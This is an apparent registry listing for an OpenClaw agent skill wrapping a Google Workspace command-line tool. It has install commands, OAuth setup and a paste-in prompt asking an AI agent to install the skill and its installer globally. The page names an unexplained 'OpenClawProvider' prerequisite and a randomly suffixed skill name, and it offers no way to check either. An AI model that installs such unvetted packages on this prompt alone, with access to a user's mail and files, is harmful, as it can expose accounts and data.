A comprehensive command-line interface for managing Gmail, Calendar, Drive, Contacts, Sheets, and Docs.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install gog-ee3cg9w
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install gog-ee3cg9w using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
gog is a versatile CLI tool designed to bring the full power of Google Workspace to your terminal and automated workflows. By utilizing this skill, users can interact with essential Google services—including Gmail, Drive, and Sheets—without the need for a web browser. It is particularly effective when integrated into Openclaw Skills to enable AI agents to perform administrative and data-driven tasks programmatically.
Built for developers who value speed and automation, gog handles the complexities of OAuth 2.0 authentication and provides a unified command structure for disparate Google APIs. This makes it an essential component for building automated reporting systems, email filters, or document management pipelines.
This skill requires OpenClawProvider to be installed. Once active, install gog using brew:
brew install steipete/tap/gogcli
Configure your Google Cloud credentials and authenticate your account:
gog auth credentials /path/to/client_secret.json
gog auth add [email protected] --services gmail,calendar,drive,contacts,sheets,docs
Verify your setup with:
gog auth list
The skill manages data across various Google services using the following structures:
| Service | Primary Operations | Key Metadata |
|---|---|---|
| Gmail | Search, Send, List | Subject, To, From, Snippet |
| Sheets | Get, Update, Append, Clear | SheetId, Range, Values (JSON) |
| Calendar | List Events | CalendarId, ISO Timestamps |
| Drive | Search, List | FileId, Name, MimeType |
| Docs | Export, Cat | DocId, Format (txt/pdf) |
--json) and headless mode (--no-input) for advanced scripting and Openclaw Skills automation.GOG_ACCOUNT environment variable to simplify multi-account workflows.Loading
A versatile command-line interface for managing Google Workspace services including Gmail, Calendar, Drive, and Sheets.

A powerful research agent designed to decompose complex queries into structured tasks and deliver synthesized, data-driven reports.

A sophisticated AI agent designed for multi-step research tasks that require planning, task decomposition, and long-context analysis.

A powerful AI agent specialized in decomposing complex research queries into actionable multi-step plans and synthesized reports.

A powerful CLI tool for interacting with Gmail, Calendar, Drive, Contacts, Sheets, and Docs within AI agent workflows.

A comprehensive command-line interface for managing Google Workspace services including Gmail, Calendar, Drive, and Sheets.








































